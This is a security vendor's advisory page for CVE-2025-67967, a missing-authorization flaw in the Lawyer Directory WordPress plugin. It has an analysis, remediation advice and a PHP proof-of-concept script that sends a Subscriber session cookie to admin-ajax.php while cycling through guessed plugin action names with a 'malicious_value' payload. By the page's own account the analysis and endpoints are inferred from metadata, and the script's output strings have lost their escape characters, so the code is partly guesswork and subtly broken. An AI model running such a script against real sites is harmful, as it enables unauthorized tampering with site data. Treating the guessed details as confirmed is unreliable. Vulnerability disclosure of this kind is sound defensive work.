Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-67967: Lawyer Directory <= 1.3.3 – Missing Authorization (lawyer-directory)

Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 1.3.3
Patched Version
Disclosed January 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67967 (metadata-based):
This vulnerability is a Missing Authorization flaw in the Lawyer Directory WordPress plugin, affecting all versions up to and including 1.3.3. The vulnerability allows authenticated attackers with Subscriber-level permissions or higher to perform unauthorized actions. The CVSS score of 4.3 (Medium) reflects a network-accessible attack requiring low-privilege authentication, leading to integrity impact without confidentiality or availability loss.

Atomic Edge research identifies the root cause as a missing capability check on a WordPress hook handler. The CWE-862 classification confirms the plugin fails to verify user permissions before executing a function. Without source code, we infer the vulnerable function is likely registered via add_action() or add_filter() for AJAX, admin-post, or REST API endpoints. The plugin omits current_user_can() or similar checks, allowing unauthorized execution. This conclusion is inferred from the CWE and the description of “missing capability check.”

Exploitation requires an authenticated attacker with at least Subscriber role. The attacker sends a crafted HTTP request to a WordPress endpoint handling plugin functions. Based on WordPress plugin patterns, the likely endpoint is /wp-admin/admin-ajax.php with an action parameter containing a plugin-specific hook like lawyer_directory_action. Alternatively, the endpoint could be /wp-admin/admin-post.php or a custom REST API route. The attacker’s payload contains parameters for the unauthorized action, such as modifying directory listings or settings.

Remediation requires adding a proper capability check before executing the vulnerable function. The patched version 1.3.4 likely inserts a conditional statement verifying the user has the required permissions, such as manage_options or a custom plugin capability. The fix should also include nonce verification for state-changing operations to prevent CSRF. These measures align with WordPress security hardening practices for authorization flaws.

The impact is unauthorized action execution by low-privileged users. While the description does not specify the exact action, CWE-862 in WordPress plugins often leads to data modification, settings changes, or privilege escalation. For a directory plugin, potential impacts include altering lawyer listings, modifying contact information, or changing plugin configurations. The integrity impact (I:L) in the CVSS vector confirms unauthorized data modification is possible.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-67967 - Lawyer Directory <= 1.3.3 - Missing Authorization
<?php
/**
 * Proof of Concept for CVE-2025-67967.
 * This script demonstrates unauthorized action execution via a missing capability check.
 * Assumptions:
 * 1. The vulnerable endpoint is the WordPress AJAX handler.
 * 2. The plugin uses an AJAX action prefixed with 'lawyer_directory_'.
 * 3. The exact action name is unknown, so we test common patterns.
 * 4. The attack requires a valid low-privilege WordPress session cookie.
 */

$target_url = 'http://vulnerable-site.com';
$cookie = 'wordpress_logged_in_abc=...'; // Replace with valid Subscriber session cookie

// Common AJAX action patterns for directory plugins
$action_candidates = [
    'lawyer_directory_save',
    'lawyer_directory_update',
    'lawyer_directory_delete',
    'lawyer_directory_edit',
    'lawyer_directory_manage',
    'lawyer_directory_settings'
];

foreach ($action_candidates as $action) {
    $post_data = [
        'action' => $action,
        'id' => '1', // Common parameter for targeting a specific record
        'data' => 'malicious_value' // Example payload for modification
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Cookie: ' . $cookie,
        'Content-Type: application/x-www-form-urlencoded'
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    echo "Testing action: $actionn";
    echo "HTTP Code: $http_coden";
    echo "Response: $responsenn";
    
    // A successful exploit often returns a 200 with plugin-specific success message
    if ($http_code == 200 && strpos($response, 'success') !== false) {
        echo "Potential successful exploitation via action: $actionn";
        break;
    }
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School